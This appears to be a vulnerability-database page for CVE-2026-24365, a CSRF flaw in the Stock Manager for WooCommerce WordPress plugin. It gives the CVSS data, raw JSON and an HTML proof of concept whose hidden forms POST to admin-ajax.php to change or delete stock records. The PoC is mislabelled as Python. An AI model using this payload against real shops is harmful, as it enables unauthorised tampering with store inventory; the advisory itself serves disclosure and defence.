Security Vulnerability Report
中文
CVE-2026-24365 CVSS 5.4 MEDIUM

CVE-2026-24365

Published: 2026-01-22 17:16:40
Last Modified: 2026-04-28 03:16:04

Description

Cross-Site Request Forgery (CSRF) vulnerability in storeapps Stock Manager for WooCommerce woocommerce-stock-manager allows Cross Site Request Forgery.This issue affects Stock Manager for WooCommerce: from n/a through < 3.6.0.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Stock Manager for WooCommerce < 3.6.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2026-24365 --> <!-- Stock Manager for WooCommerce < 3.6.0 CSRF Vulnerability --> <!DOCTYPE html> <html> <head> <title>CSRF PoC - Stock Manager for WooCommerce</title> </head> <body> <h1>CSRF PoC - Modify Stock Data</h1> <p>This PoC demonstrates CSRF vulnerability in Stock Manager for WooCommerce.</p> <!-- Form to modify stock data --> <form id="csrfForm" action="https://target-site.com/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="save_stock_data"> <input type="hidden" name="product_id" value="123"> <input type="hidden" name="stock_quantity" value="999"> <input type="hidden" name="stock_status" value="instock"> </form> <!-- Form to delete stock record --> <form id="csrfDeleteForm" action="https://target-site.com/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="delete_stock_data"> <input type="hidden" name="stock_id" value="456"> </form> <script> // Auto-submit form when page loads window.onload = function() { // Uncomment to auto-execute: // document.getElementById('csrfForm').submit(); console.log('CSRF PoC loaded. Submit forms manually for testing.'); }; </script> <p>Click buttons to test CSRF:</p> <button onclick="document.getElementById('csrfForm').submit()">Modify Stock</button> <button onclick="document.getElementById('csrfDeleteForm').submit()">Delete Stock</button> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24365", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:39.937", "lastModified": "2026-04-28T03:16:03.593", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in storeapps Stock Manager for WooCommerce woocommerce-stock-manager allows Cross Site Request Forgery.This issue affects Stock Manager for WooCommerce: from n/a through < 3.6.0."}, {"lang": "es", "value": "Vulnerabilidad de falsificación de petición en sitios cruzados (CSRF) en storeapps Stock Manager para WooCommerce woocommerce-stock-manager permite la falsificación de petición en sitios cruzados. Este problema afecta a Stock Manager para WooCommerce: desde n/a hasta &lt; 3.6.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/woocommerce-stock-manager/vulnerability/wordpress-stock-manager-for-woocommerce-plugin-3-6-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}